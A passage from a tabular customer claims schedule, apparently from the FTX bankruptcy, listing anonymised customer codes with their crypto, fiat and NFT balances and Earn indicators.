| 07352588 | | DOGE[18.2164284], TRX[1], USD[0.00] | | |
| 07352589 | | CUSDT[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07352590 | | BRZ[1], CUSDT[8], DOGE[233.39017885], ETH[.04127705], ETHW[.04127705], USD[0.12] | | |
| 07352591 | | USD[10.00] | | |
| 07352592 | | MATIC[25.92473687], SHIB[3], TRX[3], USD[0.00] | Yes | |
| 07352593 | | USD[0.00] | | |
| 07352594 | | BCH[.00022753], BRZ[1], BTC[.00189515], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07352595 | | BTC[.00020954], DOGE[1538.98019791], TRX[3], USD[0.09] | | |
| 07352596 | | BRZ[2], CUSDT[3], DAI[0], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00] | | |
| 07352597 | | USD[10.00] | | |
| 07352598 | | USD[10.00] | | |
| 07352599 | | USD[10.00] | | |
| 07352600 | | USD[0.00] | | |
| 07352601 | | TRX[168.72263635], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352602 | | DOGE[148.55782074], TRX[1], USD[38.13] | | |
| 07352603 | | BRZ[3], CUSDT[2], DOGE[1], TRX[3], USD[0.01] | Yes | |
| 07352604 | | CUSDT[2], DOGE[2.00000472], TRX[1], USD[0.00] | | |
| 07352605 | | USD[10.84] | Yes | |
| 07352606 | | BRZ[1], DOGE[0], ETH[0], ETHW[0.01069143], LINK[0], SHIB[93335.4293333], TRX[29.50157473], USD[1468.86], USDT[0] | Yes | |
| 07352607 | | CUSDT[6], USD[144.88] | | |
| 07352608 | | USD[10.00] | | |
| 07352609 | | USD[10.00] | | |
| 07352610 | | BTC[0], GRT[0], TRX[0], USD[0.00] | | |
| 07352611 | | CUSDT[5], DOGE[14.17137039], ETH[.00203361], ETHW[.00200625], SOL[.02186998], TRX[21.7106219], USD[0.00] | Yes | |
| 07352612 | | BAT[1], USD[10.00], USDT[1] | | |
| 07352614 | | USD[10.00] | | |
| 07352615 | | BAT[1], BRZ[1], CUSDT[1], TRX[2], USD[1.86] | | |
| 07352617 | | CUSDT[1], DOGE[35.33126998], USD[0.00] | Yes | |
| 07352618 | | USD[0.01] | | |
| 07352619 | | USD[10.00] | | |
| 07352620 | | USD[10.00] | | |
| 07352621 | | USD[10.00] | | |
| 07352622 | | DOGE[.09583616], USD[1.19] | | |
| 07352623 | | USD[0.00] | | |
| 07352624 | | BRZ[0.00001922], DOGE[2.04891639], USD[0.00] | | |
| 07352625 | | USD[10.00] | | |
| 07352626 | | USD[10.00] | | |
| 07352629 | | USD[10.00] | | |
| 07352630 | | CUSDT[6], SHIB[1], TRX[4], USD[0.18] | | |
| 07352631 | | DOGE[1], USD[0.00] | | |
| 07352633 | | DOGE[162.87907661], USD[0.00] | | |
| 07352634 | | USD[10.00] | | |
| 07352636 | | CUSDT[3], DOGE[.00001876], TRX[3], USD[0.00] | Yes | |
| 07352637 | | DOGE[0], USD[0.01] | | |
| 07352639 | | DOGE[1], USD[0.00] | | |
| 07352640 | | ETH[.00000082], ETHW[.00000082], USD[0.00] | | |
| 07352641 | | USD[10.00] | | |
| 07352642 | | USD[10.00] | | |
| 07352643 | | ETH[.00239358], ETHW[.00239358], USD[0.00] | | |
| 07352644 | | DOGE[558.50262679], USD[0.00] | Yes | |
| 07352645 | | BTC[0], CUSDT[.00075216], SHIB[5313713.82784068], TRX[1], USD[0.00] | Yes | |
| 07352646 | | CUSDT[12], USD[0.00] | | |
| 07352847 | | ETH[.00000003], ETHW[.00000003], USD[0.00] | Yes | |
| 07352648 | | ETH[.00518438], ETHW[.00518438], USD[0.00] | | |
| 07352649 | | USD[10.00] | | |
| 07352650 | | USD[10.00] | | |
| 07352651 | | BAT[1.01655549], BRZ[11.11890842], CUSDT[62.75248107], DOGE[26175.61829839], ETH[.00820236], ETHW[.0081066], GRT[5.21563233], SHIB[1], SOL[3.08236572], TRX[45.13975279], USD[0.23], USDT[3.30402039], YFI[.00083237] | Yes | |
| 07352652 | | CUSDT[23], DOGE[3807.68830351], SHIB[4054484.07899658], TRX[2], USD[0.00] | Yes | |
| 07352653 | | USD[10.58] | Yes | |
| 07352654 | | CUSDT[1], TRX[.00001538], USD[0.00] | | |
| 07352655 | | USD[6.00] | | |
| 07352656 | | USD[10.00] | | |
| 07352657 | | BRZ[1], TRX[1], USD[0.00] | Yes | |
| 07352658 | | USD[10.00] | | |
| 07352659 | | USD[10.00] | | |
| 07352660 | | BAT[1], BTC[.00959818], DOGE[10326.56303719], ETH[.1725435], ETHW[.17226824], SOL[19.95337355], TRX[3.14360031], USD[2520.60] | Yes | |
| 07352661 | | BRZ[1], DOGE[2], TRX[0], USD[0.00] | | |
| 07352662 | | BAT[5], BRZ[5], CUSDT[5], DOGE[12426.66225734], GRT[5], SUSHI[1], TRX[11], USD[395.01], USDT[5] | | |
| 07352663 | | USD[10.00] | | |
| 07352664 | | USD[10.00] | | |
| 07352665 | | CUSDT[2], DOGE[0], ETH[0], TRX[2], USD[0.00] | | |
| 07352666 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352667 | | BTC[0], USD[0.00] | | |
| 07352668 | Contingent, Disputed | USD[0.01], USDT[0] | | |
| 07352669 | | BRZ[1], BTC[0], CUSDT[2], DOGE[0], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07352670 | | USD[10.00] | | |
| 07352671 | | USD[10.00] | | |
| 07352672 | | USD[10.00] | | |
| 07352676 | | USD[10.00] | | |
| 07352677 | | BAT[1], CUSDT[5.32427382], DAI[.00002815], DOGE[501.99998299], GRT[1], USD[0.01] | | |
| 07352678 | | BRZ[1], BTC[.00450235], TRX[1], USD[0.00] | | |
| 07352679 | | USD[10.00] | | |
| 07352680 | | USD[10.00] | | |
| 07352681 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07352682 | | USD[10.00] | | |
| 07352683 | | BCH[0], CUSDT[1], DOGE[2.4294089], SOL[.00001652], SUSHI[.05330018], TRX[2], USD[0.86] | | |
| 07352684 | | USD[10.00] | | |
| 07352685 | | CUSDT[1], DOGE[67.83244366], KSHIB[582.91680796], TRX[4.76858668], USD[0.00] | Yes | |
| 07352686 | | USD[10.00] | | |
| 07352687 | | BTC[0], CUSDT[1], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07352688 | | CUSDT[12], DOGE[38.86476929], LTC[.07333298], TRX[1], USD[0.85] | Yes | |
| 07352689 | | USD[10.00] | | |
| 07352690 | | USD[10.00] | | |
| 07352691 | | CUSDT[2], SHIB[1], TRX[30.83577077], USD[0.01] | | |
| 07352692 | | BCH[.0563328], BRZ[2], BTC[0], CUSDT[3], DOGE[2.60941299], ETH[0], PAXG[0], SHIB[2], TRX[5], USD[0.00] | | |
| 07352693 | | USD[0.00] | | |
| 07352694 | | USD[0.00] | Yes | |
| 07352696 | | USD[10.00] | | |
| 07352697 | | BRZ[2], BTC[0], CUSDT[3], DOGE[3], ETH[0], ETHW[0], TRX[1], USD[17.07], USDT[0] | | |
| 07352698 | | BTC[.0793756], DOGE[5664.74865524], ETH[.77041767], ETHW[.77009417], SHIB[1], TRX[1], USD[2.06] | Yes | |
| 07352699 | | USD[10.00] | | |
| 07352700 | | SOL[0] | | |
| 07352701 | | USD[0.00] | | |
| 07352702 | | USD[10.00] | | |
| 07352703 | | BCH[.06050794], BTC[.00018027], DOGE[797.10945982], TRX[150.43997369], USD[0.00] | | |
| 07352704 | | USD[10.00] | | |
| 07352705 | | USD[0.00] | | |
| 07352707 | | USD[0.01] | Yes | |
| 07352708 | | USD[10.00] | | |
| 07352709 | | USD[0.00], USDT[0] | | |
| 07352710 | | CUSDT[1], DOGE[3], ETH[.2516016], ETHW[.2516016], GRT[4.12590401], TRX[1], USD[0.13] | | |
| 07352711 | | SHIB[2], UNI[0], USD[51.19], USDT[0] | | |
| 07352713 | | TRX[40.75730737], USD[0.00] | Yes | |
| 07352714 | | USD[10.00] | | |
| 07352715 | | USD[0.00] | | |
| 07352717 | | TRX[86.82380965], USD[0.00] | | |
| 07352718 | | USD[0.01] | | |
| 07352720 | Contingent, Disputed | USD[0.01] | | |
| 07352722 | | EUR[467.89], USD[0.00] | Yes | |
| 07352723 | | USD[10.00] | | |
| 07352724 | | BRZ[0], BTC[0], CUSDT[0], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07352725 | | USD[10.00] | | |
| 07352726 | | DOGE[1145.62220793], TRX[1], USD[0.00] | | |
| 07352727 | | CUSDT[2], DOGE[185.03758707], USD[0.00] | Yes | |
| 07352729 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07352730 | | USD[0.00] | Yes | |
| 07352731 | | USD[10.00] | | |
| 07352732 | | DOGE[944.99870017], SHIB[291970.8029197], USD[0.00] | | |
| 07352733 | | DOGE[848.04178706], USD[24.00] | | |
| 07352734 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352736 | | USD[10.00] | | |
| 07352737 | | DOGE[665.26803906], USD[10.00] | | |
| 07352738 | | USD[0.01], USDT[0] | | |
| 07352739 | | USD[10.00] | | |
| 07352740 | | ALGO[26.54360718], BRZ[129.26605402], CUSDT[1044.2900619], DOGE[4816.80376417], GRT[136.20213218], KSHIB[9637.52667098], LINK[17.63400628], MATIC[167.43178887], SHIB[10017928.92846649], SOL[10.79332497], SUSHI[20.06718223], TRX[2214.43814516], UNI[17.9622217], USD[0.00], USDT[0] | Yes | |
| 07352741 | | USD[10.00] | | |
| 07352742 | | CUSDT[1], DOGE[7855.13665928], TRX[1], USD[0.00] | Yes | |
| 07352743 | | DOGE[82.28344232], USD[10.00] | | |
| 07352744 | | BRZ[1], CUSDT[2], USD[0.48] | | |
| 07352745 | | CUSDT[1], DOGE[930.62453277], USD[22.62] | | |
| 07352746 | | USD[0.38] | | |
| 07352747 | | AAVE[2.37392271], AVAX[.99931299], BAT[163.52508912], BCH[.00000009], BRZ[20.88793874], BTC[.00893462], CUSDT[180.46045856], DOGE[674.41674536], ETH[2.13561710], ETHW[2.13470060], GRT[329.19044686], LINK[8.17630188], LTC[2.15867051], MATIC[440.11277252], MKR[.02682263], PAXG[.00663306], SHIB[668575.01646405], SOL[38.12494274], SUSHI[27.25419618], TRX[880.27772599], UNI[8.72137517], USD[0.10], USDT[0], YFI[.00037765] | Yes | |
| 07352748 | | DOGE[15.20638606], USD[0.00] | | |
| 07352749 | | CUSDT[18], DOGE[3379.81046403], NFT (390679660138960383/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #63)[1], SHIB[3304565.14911195], SOL[39.33154441], TRX[6308.6205667], USD[0.00] | | |
| 07352750 | | USD[10.00] | | |
| 07352751 | | USD[10.00] | | |
| 07352752 | | CUSDT[4], DOGE[.23217921], TRX[1], USD[0.00] | Yes | |
| 07352753 | | USD[10.00] | | |
| 07352754 | | USD[10.00] | | |
| 07352755 | | SUSHI[.56272718], USD[0.00] | | |
| 07352756 | | USD[10.00] | | |
| 07352757 | | DOGE[0.48597011], USD[0.00] | | |
| 07352758 | | USD[10.00] | | |
| 07352759 | | USD[10.00] | | |
| 07352760 | | USD[10.00] | | |
| 07352761 | | DOGE[2], SUSHI[9.68992445], UNI[8.6984242], USD[0.00] | | |
| 07352762 | | ETH[.00001563], ETHW[.00001563], TRX[2], USD[0.00] | | |
| 07352763 | | CUSDT[1], DOGE[1.7708374], USD[0.00] | | |
| 07352764 | | BTC[.00208612], CUSDT[5], DOGE[1], TRX[1], USD[0.08] | Yes | |
| 07352765 | | USD[0.00] | | |
| 07352766 | | USD[0.00] | | |
| 07352767 | | BTC[0], CUSDT[1], DOGE[2], SOL[.00009009], TRX[3], USD[0.01] | | |
| 07352768 | | ETH[0], SUSHI[0], USD[0.00] | | |
| 07352769 | | USD[0.01] | | |
| 07352770 | | BAT[.00098137], DOGE[.00008116], GRT[.00009512], LINK[.000058], NFT (352383487500734340/Payne )[1], NFT (421961368738558442/Mgm)[1], NFT (458795075326465141/64 impala )[1], SOL[.02640894], SUSHI[.00006194], TRX[3.0000617], UNI[.0001172], USD[0.57], USDT[1] | | |
| 07352771 | | USD[10.00] | | |
| 07352772 | | USD[10.00] | | |
| 07352773 | | USD[10.00] | | |
| 07352774 | | BTC[.00022868], DOGE[1747.74977981], TRX[1], USD[0.00] | Yes | |
| 07352775 | | CUSDT[2], DOGE[1], GRT[1], LTC[.00008268], USD[10.00] | | |
| 07352776 | | USD[0.01], USDT[0] | Yes | |
| 07352778 | | USD[10.00] | | |
| 07352779 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07352780 | | USD[10.00] | | |
| 07352781 | | USD[0.01] | | |
| 07352782 | | BAT[60.55619296], BCH[1.00189895], BTC[.01887717], DOGE[1291.07350888], GRT[59.83783706], SOL[1.17480242], SUSHI[3.94418047], TRX[1470.61295087], USD[25.00] | | |
| 07352783 | | USD[10.00] | | |
| 07352784 | | USD[0.01] | | |
| 07352785 | | USD[10.00] | | |
| 07352786 | | DOGE[2.10266758], USD[0.00], USDT[0] | | |
| 07352788 | | CUSDT[3], DOGE[5], ETH[0], LINK[0], SHIB[1376400.62705262], USD[0.00], USDT[0.00038880] | | |
| 07352789 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07352790 | | USD[0.07] | | |
| 07352791 | | USD[10.00] | | |
| 07352792 | | USD[10.00] | | |
| 07352793 | | CUSDT[1], USD[0.00] | | |
| 07352794 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352795 | | DAI[.00034825], DOGE[266.01636498], USD[0.00] | | |
| 07352796 | | BRZ[1], DOGE[0], ETH[0], USD[574.35] | | |
| 07352797 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07352798 | | USD[10.00] | | |
| 07352799 | | CUSDT[101.9726651], DOGE[4.26042855], EUR[0.00], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07352800 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07352801 | | USD[10.00] | | |
| 07352802 | | BRZ[1], BTC[.00361086], CUSDT[7], DOGE[279.58815979], TRX[1], USD[0.00] | Yes | |
| 07352803 | | USD[10.00] | | |
| 07352804 | | TRX[1.655901], USD[0.00] | | |
| 07352805 | | CUSDT[2], ETH[.00376727], ETHW[.00376727], USD[0.00], USDT[0] | | |
| 07352806 | | BRZ[0], BTC[0], DOGE[0], LTC[0], TRX[0], USD[0.80], USDT[0] | | |
| 07352807 | | SOL[1.00765149], TRX[1657.66258126], USD[0.00], USDT[1] | | |
| 07352808 | | CUSDT[1], DOGE[654.34982363], SHIB[276701.71555063], USD[0.04] | | |
| 07352809 | | BAT[0], CUSDT[7], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07352810 | | CUSDT[2], DOGE[80.71084872], USD[0.00] | | |
| 07352811 | | CUSDT[7], DOGE[5613.76806161], ETH[.00000036], ETHW[.00000036], LTC[1.16391096], SHIB[1878844.62959324], SOL[.66169067], TRX[3], USD[150.21] | Yes | |
| 07352812 | | USD[10.00] | | |
| 07352813 | | BRZ[1], CUSDT[1], TRX[1658.40618756], USD[0.00] | | |
| 07352815 | | USD[10.00] | | |
| 07352816 | | USD[10.00] | | |
| 07352817 | | AAVE[0], AUD[0.00], AVAX[0], BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[1], ETH[.00051174], ETHW[0], KSHIB[1.53692225], LINK[0], LTC[0.00912552], MATIC[0.00043707], MKR[0], NEAR[0.00307102], NFT (4764558455750220009/FTX - Off The Grid Miami #3111)[1], NFT (531372569592146100/I'm Still Waiting)[1], PAXG[0.00001088], SHIB[25], SOL[0], TRX[8.24176473], UNI[0], USD[0.50], USDT[0.00000001], YFI[0] | Yes | |
| 07352818 | | USD[10.00] | | |
| 07352819 | | USD[10.00] | | |
| 07352820 | | USD[0.01] | Yes | |
| 07352821 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07352823 | | BRZ[1], USD[0.00] | | |
| 07352824 | | ETH[0.00172185], ETHW[0.00172185], USD[0.00] | | |
| 07352825 | | TRX[1.85233543], USD[0.00] | | |
| 07352827 | | DOGE[1], USD[0.00] | | |
| 07352828 | | BAT[1.52430929], CUSDT[1], TRX[23.82111245], USD[93.82] | | |
| 07352829 | | USD[0.00] | | |
| 07352830 | | USD[10.00] | | |
| 07352831 | | USD[30.00] | | |
| 07352832 | | DOGE[1], ETH[0], USD[0.01] | | |
| 07352833 | | CUSDT[1], USD[0.00] | | |
| 07352834 | | DOGE[175.95538053], USD[0.00] | | |
| 07352835 | | CUSDT[8], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07352837 | | DOGE[15.16264011], LINK[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07352838 | | BTC[.00020726], USD[0.00] | | |
| 07352839 | | DOGE[17.60035252], USD[0.00] | | |
| 07352840 | | DOGE[1], USD[0.00] | | |
| 07352841 | | DOGE[173.14146488], USD[0.00] | | |
| 07352842 | | USD[10.00] | | |
| 07352843 | | USD[10.00] | | |
| 07352844 | | USD[10.00] | | |
| 07352845 | | BCH[0], DOGE[0], GRT[0], LTC[0], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07352846 | | USD[10.00] | | |
| 07352847 | | USD[10.00] | | |
| 07352848 | | BTC[0.00000288], DAI[.00000001], ETH[.00000948], ETHW[0], LINK[8.85181766], USD[0.02] | Yes | |
| 07352849 | | USD[10.00] | | |
| 07352850 | | USD[0.00] | | |
| 07352851 | | USD[10.00] | | |
| 07352852 | | USD[10.00] | | |
| 07352853 | | USD[10.00] | | |
| 07352854 | | USD[10.00] | | |
| 07352855 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352856 | | CUSDT[2], USD[0.01] | | |
| 07352857 | | CUSDT[1], ETH[.01299871], ETHW[.01283455], USD[0.00] | Yes | |
| 07352858 | | DOGE[200.4012032], USD[0.00] | | |
| 07352860 | | USD[10.00] | | |
| 07352861 | | DOGE[1], GRT[5.52411788], USD[0.01] | | |
| 07352862 | | BTC[.00000018], USD[0.00] | | |
| 07352863 | | TRX[1], USD[0.13] | Yes | |
| 07352865 | | BTC[0], CUSDT[6], DOGE[0], TRX[1], USD[0.00], USDT[1] | | |
| 07352866 | | USD[0.00] | | |
| 07352867 | | USD[10.00] | | |
| 07352868 | | BAT[.0000003], CUSDT[2], DOGE[.00057138], TRX[1], USD[0.00] | Yes | |
| 07352869 | | BRZ[1], CUSDT[2], DOGE[588.20663755], TRX[1], USD[0.00] | | |
| 07352870 | | BAT[1], BRZ[1], CUSDT[2], DOGE[2], GRT[1], TRX[6], USD[0.75], USDT[0] | | |
| 07352871 | | USD[10.00] | | |
| 07352872 | | BTC[.0028267], CUSDT[7], DOGE[.00004401], GRT[1], USD[0.95] | Yes | |
| 07352873 | | USD[10.00] | | |
| 07352874 | | DOGE[76.91638582], TRX[1], USD[227.08] | | |
| 07352875 | | DOGE[0], LTC[0] | | |
| 07352876 | | USD[10.00] | | |
| 07352877 | | ETH[0], LINK[3.984], TRX[1364.61], UNI[6.2708], USD[0.00], USDT[0.00000066] | | |
| 07352878 | | USD[0.05] | | |
| 07352879 | | USD[10.00] | | |
| 07352880 | | BAT[77.7036], DOGE[646.1812], SHIB[1335486.13799309], SOL[3.03882], SUSHI[1.981], UNI[2.39088], USD[1.74] | | |
| 07352881 | | USD[10.00] | | |
| 07352883 | | DOGE[0], GRT[0], LINK[0], SHIB[2], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07352884 | | USD[0.00] | | |
| 07352885 | | USD[10.00] | | |
| 07352886 | | USD[10.00] | | |
| 07352887 | | BRZ[1], DOGE[.000029], USD[18.71] | | |
| 07352888 | | BAT[1.01631421], BRZ[3], CUSDT[11], GRT[1.00310987], TRX[2213.22147143], USD[0.00] | Yes | |
| 07352889 | | CUSDT[1], DOGE[5016.80881794], USD[10.00] | | |
| 07352890 | | USD[10.00] | | |
| 07352891 | | USD[10.00] | | |
| 07352892 | | CUSDT[4], TRX[2], USD[0.01] | | |
| 07352893 | | USD[0.48] | | |
| 07352894 | | DOGE[146.90212432], TRX[1], USD[0.00] | | |
| 07352896 | | USD[10.00] | | |
| 07352897 | | USD[10.00] | | |
| 07352898 | | BTC[.00161646], CUSDT[5], DOGE[6], GRT[26.72877941], TRX[1], USD[0.80] | | |
| 07352899 | | CUSDT[1], DOGE[2935.99196937], USD[0.00] | Yes | |
| 07352900 | | DOGE[0], ETH[0], GBP[0.00], LTC[0], USD[0.00], USDT[0] | | |
| 07352901 | | CUSDT[1], DOGE[4447.73273007], ETH[.0834381], ETHW[.0834381], TRX[1], USD[0.00] | | |
| 07352902 | | USD[10.00] | | |
| 07352903 | | USD[10.00] | | |
| 07352904 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07352905 | | DOGE[0.00136023], NFT [430100178511487949/Bahrain Ticket Stub #1830][1], NFT [506662425694863257/Barcelona Ticket Stub #1688][1], SHIB[724445.52451884], SOL[.00000097], USD[17.51] | Yes | |
| 07352906 | | BTC[.00005761], USD[0.00] | | |
| 07352907 | | BTC[0], DOGE[842.62304629], ETH[.008908], ETHW[0.00890799], LINK[5.60750254], USD[0.00] | | |
| 07352908 | | USD[10.00] | | |
| 07352909 | | USD[10.00] | | |
| 07352910 | | CUSDT[1], USD[0.00] | | |
| 07352911 | | BTC[.02474827], CUSDT[6], DOGE[2076.56873525], ETH[.38934403], ETHW[.38918053], MATIC[6.66635185], TRX[307.47308891], USD[0.05] | Yes | |
| 07352912 | | BRZ[1], DOGE[.00015334], USD[0.01] | | |
| 07352913 | | DOGE[.00014728], TRX[2], USD[0.01] | Yes | |
| 07352914 | | CUSDT[3], USD[40.62] | | |
| 07352915 | | USD[10.00] | | |
| 07352916 | | DOGE[0], USD[1.69] | | |
| 07352917 | | DOGE[1.00000186], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352918 | | BAT[0], DOGE[67.49985940], ETH[0], ETHW[0], SHIB[2], USD[68.91] | Yes | |
| 07352919 | | USD[0.58] | | |
| 07352920 | | USD[10.96] | Yes | |
| 07352921 | | USD[10.00] | | |
| 07352922 | | USD[10.00] | | |
| 07352923 | | USD[10.00] | | |
| 07352924 | | BAT[1], BRZ[1], CUSDT[1], ETH[.00000017], ETHW[.00000017], TRX[1], USD[0.00] | | |
| 07352925 | | USD[10.00] | | |
| 07352926 | | USD[10.00] | | |
| 07352927 | | USD[10.00] | | |
| 07352928 | | BRZ[2], BTC[0], CUSDT[5], DOGE[1], ETH[.00000001], ETHW[0], TRX[2], USD[0.01], USDT[0 | | |
| 07352929 | | USD[10.00] | | |
| 07352930 | | USD[0.01] | | |
| 07352931 | | CUSDT[3], DOGE[1145.75565504], USD[0.09] | | |
| 07352932 | | USD[10.00] | | |
| 07352933 | | BRZ[1], DOGE[1], TRX[8], USD[597.90], USDT[0] | Yes | |
| 07352934 | | DOGE[2.54186654], USD[0.00] | | |
| 07352935 | | BRZ[1], CUSDT[9], DOGE[227.49398674], USD[0.00] | | |
| 07352936 | | USD[60.00] | | |
| 07352937 | | USD[10.00] | | |
| 07352938 | | USD[10.00] | | |
| 07352939 | | UNI[.35805151], USD[0.00] | | |
| 07352940 | | USD[10.00] | | |
| 07352941 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07352942 | | BRZ[1], DOGE[2], LTC[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07352943 | | CUSDT[1], DOGE[3186.20667364], USD[0.00] | | |
| 07352944 | | BRZ[1], CUSDT[11], DOGE[331.93583235], ETH[1.06944104], ETHW[1.06899191], LINK[1.5254231], TRX[3], USD[0.00], USDT[1.10645284] | Yes | |
| 07352945 | | BAT[1.0151131], BRZ[8.65872477], CUSDT[11], DOGE[11.06135949], GRT[2.036969], LINK[646.50581134], SHIB[4], SOL[38.4828177], TRX[3], USD[1.55], USDT[6.50287663] | Yes | |
| 07352946 | | CUSDT[2], DOGE[.02337667], USD[0.01] | Yes | |
| 07352947 | | BTC[0], CUSDT[2], USD[0.00] | | |
| 07352948 | | CUSDT[1], USD[0.00] | | |
| 07352949 | | USD[10.00] | | |
| 07352951 | | USD[10.00] | | |
| 07352952 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07352953 | | CUSDT[1], USD[0.01] | | |
| 07352954 | | USD[10.00] | | |
| 07352955 | | USD[110.00] | | |
| 07352957 | | DOGE[0], ETH[0], ETHW[0], LINK[1.02531695], USD[0.01], USDT[0] | | |
| 07352958 | | CUSDT[3], DOGE[1], TRX[1], USD[276.89] | | |
| 07352959 | | USD[10.00] | | |
| 07352960 | | BRZ[.00232945], DOGE[0], GRT[.0000425], USD[0.50] | Yes | |
| 07352961 | | BRZ[1], CUSDT[1], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07352962 | | BRZ[3], CUSDT[6], TRX[8], USD[0.00] | | |
| 07352963 | | USD[10.00] | | |
| 07352964 | | TRX[161.8939258], USD[0.00] | | |
| 07352965 | | BRZ[2], TRX[2], USD[0.01] | | |
| 07352966 | | USD[10.00] | | |
| 07352967 | | USD[10.00] | | |
| 07352968 | | BRZ[1], CUSDT[2], DOGE[4249.3877468], ETH[.09423503], ETHW[.09423503], SHIB[1402327.86425466], TRX[1], USD[0.00] | | |
| 07352969 | | DOGE[22.56393445], USD[0.00] | | |
| 07352970 | | USD[0.00] | | |
| 07352971 | | BAT[.00003209], BRZ[.00009137], CUSDT[26], DOGE[.0000024], LINK[.00004002], LTC[.00004783], SOL[.00000545], SUSHI[.00000831], TRX[.00008179], USD[0.01], USDT[0.00009714] | Yes | |
| 07352972 | | USD[10.00] | | |
| 07352973 | | USD[10.00] | | |
| 07352974 | | USD[0.00] | | |
| 07352975 | | DOGE[1], USD[0.01] | | |
| 07352976 | | USD[10.00] | | |
| 07352977 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352978 | | USD[10.00] | | |
| 07352979 | | USD[10.00] | | |
| 07352980 | | USD[10.00] | | |
| 07352981 | | CUSDT[4], USD[0.14] | | |
| 07352982 | | USD[10.00] | | |
| 07352983 | | USD[10.00] | | |
| 07352984 | | USD[10.00] | | |
| 07352985 | | CUSDT[7], DOGE[69.43621122], ETH[.0013002], ETHW[.0013002], USD[0.00] | | |
| 07352987 | | CUSDT[1], USD[0.01] | | |
| 07352988 | | BRZ[0], BTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07352989 | | USD[0.98] | | |
| 07352990 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07352991 | | USD[10.00] | | |
| 07352992 | | USD[10.00] | | |
| 07352993 | | BAT[1], CUSDT[4], TRX[3], USD[0.00] | | |
| 07352994 | | BTC[.00029364], CUSDT[7], DOGE[1], TRX[.00003294], USD[0.00] | Yes | |
| 07352995 | | BTC[.001451199], CUSDT[3], DOGE[2663.09244023], LINK[1.11697999], SHIB[579776.40925715], TRX[1402.57554496], USD[13.40] | Yes | |
| 07352996 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07352997 | | USD[10.00] | | |
| 07352998 | | BRZ[1], DOGE[20282.67946877], USD[11.10] | Yes | |
| 07352999 | | USD[10.00] | | |
| 07353000 | | USD[10.00] | | |
| 07353001 | | BAT[0], BRZ[0], DAI[0], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[293.38947344], UNI[0], USD[0.00], USDT[0] | | |
| 07353003 | | TRX[1], USD[0.07] | | |
| 07353004 | | BAT[20.10813746], USD[0.00] | Yes | |
| 07353005 | | USD[10.00] | | |
| 07353006 | | USD[10.00] | | |
| 07353007 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07353008 | | DOGE[1], USD[0.18] | | |
| 07353010 | | USD[10.00] | | |
| 07353011 | | USD[10.00] | | |
| 07353012 | | USD[0.00] | | |
| 07353014 | | USD[10.00] | | |
| 07353015 | | USD[10.00] | | |
| 07353016 | | USD[10.00] | | |
| 07353017 | | BAT[1], BRZ[4], DOGE[1], ETH[0], TRX[3], USD[0.00] | | |
| 07353018 | | USD[10.00] | | |
| 07353019 | | CUSDT[5], DOGE[1739.67597457], MATIC[104.9858718], NFT [511131163153822713/BB Green #5][1], TRX[3], USD[0.02] | Yes | |
| 07353020 | | USD[10.00] | | |
| 07353021 | | DOGE[55.51812135], USD[0.00] | Yes | |
| 07353022 | | CUSDT[1], DOGE[3.00025097], USD[0.01] | | |
| 07353023 | | BCH[0], BRZ[1], BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07353024 | | USD[0.00] | | |
| 07353025 | | DOGE[0], USD[0.01], USDT[0] | | |
